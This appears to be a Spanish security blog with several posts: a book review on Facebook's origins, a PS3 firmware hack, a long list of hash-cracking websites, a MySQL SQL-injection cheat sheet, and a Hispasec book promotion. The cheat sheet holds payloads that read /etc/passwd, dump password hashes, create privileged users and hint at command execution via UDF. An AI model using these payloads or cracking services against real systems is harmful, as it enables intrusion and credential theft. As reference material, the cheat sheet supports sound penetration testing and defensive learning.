The Social Network

Era inevitable que tarde o temprano alguien escribiera algo sobre la creación de una de los proyectos mas revolucionarios de los últimos tiempos. Hablo del libro «Multimillonarios por accidente: El nacimiento de Facebook. Una historia de Sexo, Dinero, Talento y Traición«(amazon.com), de Ben Mezrich. En este libro se relatan los años universitarios de Mark Zuckerberg relacionados con la creación de Facebook, el cual en un principio no era más que una recopilación de las fotografías de los miembros de las residencias de Harvard a modo de anuario. Lo que hasta hace unos días me hacía revolver las neuronas era el motivo del estallido que tubo una web de este tipo, propagándose a tal velocidad y a tan gran escala sin inversión de marketing ni nada por el estilo, pues suponía que en un principio solo subirían su foto a este sistema inicial un número reducido de miembros, que serían los amiguetes del Zuckerberg, pero me equivocaba por completo. Zuckerberg consiguió tener publicadas en su web las fotos de absolutamente todos los miembros de residencias antes mentados, sin su consentimiento inicial, obteniendo las fotos por medio de sus conocimientos sobre seguridad informática a través de las páginas de las residencias.

El propio Mark llevaba un blog en el que detallaría todas sus peripecias y acciones en todos los servidores de las residencias, cómo accedía a ellos, que mecanismos tuvo que romper, dificultades que se encontraba, número de cervezas que llevaba según tecleaba, etc.

Podréis encontrar más información acerca de estas actividades en SecurityByDefault
Parece que como todo en esta vida el esfuerzo siempre es recompensado, de una manera o de otra, siempre y cuando te encuentres FUERA de españa, claro.
Aquí el trailer de la película basada en el libro anteriormente citado:

1

PS3 3.21 con "OtherOS"

Desde luego este chiquillo es un crack, y me refiero a George Hotz (o GeoHot). Con 20 años ya tiene en su curriculum el haber creado el jailbreak para iPhone, el conseguir ejecutar código en la PS3 con el uso del OtherOS, y ahora que los de PS3 querían fastidiar el asunto con un nuevo firmware que no permitiera esa opción, va el muchacho y les da una colleja a los de Sony modificando el firmware y permitiendo que la opción de OtherOS siga funcionando.
http://www.youtube.com/watch?v=1-9wLWQ4-uA

1

HashCrackers ONLINE

En muchas ocasiones he necesitado recuperar una contraseña que había olvidado pero de la que sí podía acceder a su forma hasheada en MD5. Existen numerosos sitios en internet dónde han ido almacenando las cadenas hash de combinaciones de caracteres, por lo que es posible que si la contraseña no es demasiado compleja, se pueda recuperar mediante estas herramientas. A continuación os dejo una buena lista de sitios donde podréis desencriptar vuestras cadenas hasheadas:
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/Cr*ck-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/
MD5:
http://md5.sh4ka.fr
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (Para los que no sepan ruso, poner el MD5 en la segunda caja de texto)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in…roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=Cr*ck
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php
MD4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
SHA1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index.ph…p;products_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/

1

Tabla de Trucos para Inyección de SQL

Versión SELECT @@version
Comentarios SELECT 1; #comentario
SELECT /*comentario*/1;
Usuario Actual SELECT user();
SELECT system_user();
Listar Usuarios SELECT user FROM mysql.user; — priv
Listar Hashes de Passwords SELECT host, user, password FROM mysql.user; — priv
Crackear Passwords John the Ripper crackea hashes de MySQL.
Listar privilegios SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
Listar cuentas DBA SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;
SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Base de Datos Actual SELECT database()
Listar Bases de Datos SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
Listar Columnas SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Listar Tablas SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Encontrar Tablas apartir de un nombre de Columna SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — en cuentra las tablas con columnas llamadas ‘username’
Seleccionar la N Fila SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # filas numeradas desde 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # filas numeradas desde 0
Seleccionar el N caracter SELECT substr(‘abcd’, 3, 1); # devuelve c
AND Bit a Bit SELECT 6 & 2; # devuelve 2
SELECT 6 & 1; # devuelve 0
Valor ASCII -> Caracter SELECT char(65); # devuelve A
Char -> ASCII Value SELECT ascii(‘A’); # returns 65
Casting SELECT cast(‘1′ AS unsigned integer);
SELECT cast(‘123′ AS char);
Concatenación de cadenas SELECT CONCAT(‘A’,’B’); #devuelve AB
SELECT CONCAT(‘A’,’B’,’C’); # devuelve ABC
Sentencia IF SELECT if(1=1,’foo’,’bar’); — devuelve ‘foo’
Sentencia CASE SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # devuelve A
Evitar Comillas SELECT 0×414243; # devuelve ABC
Demora de Tiempo SELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Hacer Peticiones DNS ¿Imposible?
Ejecución de Comandios Si mysqld (<5.0) se ejecuta como root Y te haces con una cuenta DBA podrás ejecutar comandos del SO subiendo un archivo compartido a /usr/lib(o similar). El archivo .so debe contener una Función de Usuario Definida (UDF). raptor_udf.c explica exactamente como puedes hacerlo. Recuerda compilar para la arquitectura del objetivo pues no tiene porque ser la misma que la del atacante.
Acceso a Archivos Locales …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, solo puede leer archivos de lectura universales.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, escribir en archivo de sistema
Hostname, Dirección IP ¿Imposible?
Crear Usuarios CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Borrar Usuarios DROP USER test1; — priv
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%’; — priv
Localización de los archivos de BD SELECT @@datadir;
Default/System Databases information_schema (>= mysql 5.0)
mysql
1

HispaSec-”Una al Día: 11 años de Seguridad Informática”

«Una al día: 11 años de seguridad informática» invita al lector a realizar un recorrido por los hechos más destacados desde el nacimiento del boletín de Hispasec a nuestros días. Bajo una perspectiva amena y entretenida, abarca desde las noticias más relevantes de ámbito general ocurridas en el mundo pasando por los hitos y anécdotas más destacadas en el campo de la seguridad informática.
A modo de anuario, a capítulo por año, el libro ofrece una visión global desde una perspectiva histórica, incluyendo entrevistas para la ocasión con las figuras más relevantes de los últimos once años: Bruce Schneider, Eugene Kaspersky, Johannes Ullrich, Juan Carlos G. Cuartango, Mikel Urizarbarrena… Por último, se han seleccionado algunas de las mejores Una al día de todos los tiempos, que reflejan el estado de la seguridad en el momento en el que fueron redactadas.

¿Es una recopilación de Una al día?

No. Incluye algunas, las más relevantes o interesantes. El libro está compuesto por material nuevo, redactado desde la perspectiva del tiempo. Además de las entrevistas y las anécdotas propias de Hispasec.

¿De qué va el libro entonces?

Se trata de un anuario de seguridad informática, centrado en los ultimos once años: desde 1998 hasta 2009. Once años de Una al día y de noticias de seguridad informática reunidos por año. También incluye entrevistas exclusivas a los personajes más relevantes de cada momento en el mundo de la seguridad: Bruce Schneier, Eugene Kaspersky, Cuartango, Mikel Urizarbarrena, Jorge Ramió, Johannes Ullrih, Merce Molist, Hector Montenegro, Juan Salom… Además de noticias y anécdotas relevantes de cada año, fuera del ámbito de la seguridad informática. Por último, se han reproducido las mejores Una al día de todos los tiempos, las que mejor reflejan el estado de la seguridad en el momento en el que fueron redactadas.

¿Cómo está construido el libro?

Cada año representa un capítulo. Cada año a su vez se divide en cuatro secciones: «Durante ese año…» donde se sitúa históricamente al lector con noticias mundialmente relevantes no necesariamente vinculadas con la seguridad informática. «En seguridad informática… » se realiza un repaso por las noticias, anécdotas, tendencias y todo tipo de hechos relevantes de la seguridad informática que tuvieron lugar durante ese año, vistos con las perspectiva del tiempo transcurrido. «Una al día»: donde se reproducen los cuatro o cinco mejores boletines de cada año, y con el que se complementa la visión global de la seguridad de ese periodo. «Entrevistas» donde se han conseguido entrevistas con los personajes más relevantes de la seguridad informática de cada momento, realizadas para la ocasión.

Descargar en PDF

1